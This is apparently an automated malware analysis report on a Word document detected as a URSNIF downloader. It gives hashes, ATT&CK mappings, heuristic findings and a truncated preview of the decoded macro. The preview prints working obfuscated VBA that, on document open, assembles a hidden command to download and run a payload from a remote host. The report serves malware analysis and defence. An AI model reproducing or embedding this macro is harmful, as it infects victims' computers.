Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 069d3539af0e666c…

MALICIOUS

Office (OLE)

61.6 KB Created: 2018-09-10 06:34:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 306c0b839edc88c2e427a9967b14f72f SHA-1: 88a7cab16fc7ec9390b8bed6c44026d3f6432229 SHA-256: 069d3539af0e666ce2a74b210f3dbc77635bbf5c381a290716cf7c2c264f5acb
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5021 bytes
SHA-256: 56309a67e1cffa5d49e548f36275f9c61a12663a85cf2e3265258643df08abe0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jsiQIziN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "KRfd" + "FHnW"
   Second "UE" + "iaswH" + "3087" + "G"
   Second "308763403" + "GBiuQ" + "r" + "883"
   Second "126739102" + "pUVfXYtAO" + "7689" + "446489022"
   Second "iFzFiMN" + "zlpYp" + "fSRF" + "ljz"
Shell CfcSWjic + CDTUZ, CStr(vbHide)
   Second "2347" + "262287524"
   Second "G" + "uHBFKQiVT" + "FkASp" + "AzdslDLFNnC"
   Second "sIWizlKP" + "6366" + "369796046" + "T"
   Second "7437" + "kX"
   Second "U" + "155175130"
End Sub



Attribute VB_Name = "ciLujYs"
Function CfcSWjic()

On _
Error _
Resume _
Next
Second "311218274" + "LCt" + "4534" + "123237466"
   Second "OEUKjAtaA" + "FiWv"
UEQkX = Format(Chr(7 + 3 + 16 + 6 + 67)) + "md /" + "V^" + ":^O/" + Format(Chr(5 + 2 + 11 + 4 + 45)) + Format(Chr(2 + 1 + 5 + 2 + 24)) + "^s" + "e^t ^0B" + "="
Second "j" + "365694501" + "97987281" + "520593960"
   Second "6084" + "f" + "ZhKZi" + "79090721"
   Second "Lu" + "4169"
   Second "kTPXbpK" + "ItQGJjKqHj"
   Second "8754" + "ozjq" + "JSGizZnl" + "EiTqbJr"
wPHdW = "^  ^" + " ^ ^ ^" + " ^ ^   " + " " + "  ^ " + "^ ^ ^ }" + "^}{h" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^t" + "^a" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "}^;^k" + "a^erb" + ";v"
Second "KnCSJjDdfsAzNv" + "oP" + "726" + "6432"
   Second "s" + "250634768" + "186887987" + "lFwOEcXWt"
   Second "128361133" + "bH"
HNlvmkQYcb = "M^U^" + "$ ^m" + "^e" + "tI-^e" + "^kov" + "n" + "I" + "^;)v"
Second "jadFXolGzzhd" + "k" + "oE" + "hEDEDjH"
   Second "AkwzAIX" + "c" + "6948" + "qNRNI"
   Second "62708528" + "QwV"
nIrNSBZ = "M^U^$ " + ",^" + "w^XQ$(" + "^el^i^F" + "da" + "^" + "o" + "^ln" + "^w^o^" + "D" + "^.^Y"
Second "MjjiG" + "scNcmF" + "4103" + "IXN"
   Second "lDkWBzhVi" + "bZOLQrv" + "3140" + "8701"
   Second "165344600" + "zzLX" + "siwFjqq" + "256264407"
   Second "qOu" + "FM" + "3393" + "204379887"
   Second "srXv" + "LXnbncW"
TtkanXwvzS = "j^D${" + "yrt{)" + "wKz^$" + " ni^" + " " + "^w" + "XQ^$" + "(^h" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "ae" + "r^o^f"
Second "nHniS" + "wsb"
   Second "410861260" + "9330"
   Second "irhPlNmQo" + "8969" + "rEKM" + "lX"
   Second "74069496" + "WU" + "514922955" + "uqVGVjCP"
ZRRknsHv = ";^" + "'e^" + "xe.'" + "+^" + "sm^h$" + "^+^'^\" + "'+" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^il" + "^bu^p^:" + "vn" + "^e" + "^$"
Second "wiGjrDlLtMziR" + "9029" + "FpuIOH" + "ULoTcHT"
   Second "jlzXrJ" + "430324792"
KGQQEUoJj = "=vMU$" + "^;'^0" + "1" + "7^'^ ^=" + "^ ^sm" + "h$;)'^" + "@^'(t^" + "i" + "^lp" + "^S^." + "^'n" + "k^" + "t^."
Second "H" + "7047" + "PWmz" + "iqDCf"
   Second "cwDj" + "6921" + "2384" + "351288555"
BKdAd = "^" + "4g^m" + "^o^=^l?" + "p^h^p^." + "^" + "t^o" + "^ksn^a^" + "p^o/^"
Second "4061" + "428217386" + "RMPvRA" + "u"
   Second "NAw" + "nQzlAVw"
   Second "uTG" + "513277977"
cSjRv = "TTR/^mo" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^." + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^x^" + "zy^t^" + "e^egh^" + "y^y" + "^snai^" + "oo//:" + "^p" + "^t^" + "th'^"
Second "zEpjub" + "EmuU"
   Second "EnAMi" + "16330789" + "504556870" + "7770"
pPvWSzPjHi = "=^w" + "Kz^$;t" + "n^e" + "i^l" + Format(Chr(5 + 2 + 11 + 4 + 45)) + "b^e" + "^"
Second "4896" + "hFGW"
   Second "CjVp" + "39440823"
dlGIPPZKr = "W^.t" + "^eN^" + " t" + Format(Chr(7 + 3 + 16 + 6 + 67)) + "^" + "e^j" + "^b^o-^" + "wen" + "^=Y^jD" + "$" + "^ ^ll^e" + "^h" + "sr" + "ew"
Second "D" + "XPl" + "1736" + "194586901"
   Second "588" + "hOa" + "230445417" + "148275373"
   Second "28877561" + "zTaLlcalDHUD" + "Fd" + "328349463"
   Second "U" + "851"
   Second "rdArMoEQwGFs" + "495287311"
XIsawU = "^" + "op&&for" + " /^L %r" + " ^in (" + "^2^6^6" + ",^" + "-1,0" + ")d^o s" + "^e^t ^" + "XR^b"
CfcSWjic = UEQkX + wPHdW + HNlvmkQYcb + nIrNSBZ + TtkanXwvzS + ZRR
... (truncated)